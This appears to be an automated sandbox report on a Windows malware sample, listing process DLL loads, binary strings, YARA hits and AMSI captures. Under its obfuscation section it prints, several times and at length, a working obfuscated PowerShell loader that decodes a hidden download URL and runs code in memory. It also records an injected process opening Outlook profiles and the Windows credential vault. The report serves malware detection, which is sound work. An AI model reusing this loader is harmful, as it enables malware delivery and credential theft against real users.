          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: m.Core.pdbH\ source: powershell.exe, 0000000E.00000002.1648566451.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659572964.0000000008277000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp, clip.exe
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdb source: wab.exe, wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.1648566451.0000000002AC9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdbGCTL source: wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\symbols\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$", "0")
          Source: Yara matchFile source: 00000012.00000002.1843095733.00000000036C7000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1660374596.0000000009B07000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1660236750.00000000086F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1653655863.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Gteskabsbruddenes $lesses $Altereres), (Anspndende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Outstations = [AppDomain]::CurrentDomain.GetAssemblies()
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Restraighten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Constantin, $false).DefineType($blindcat, $S
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout 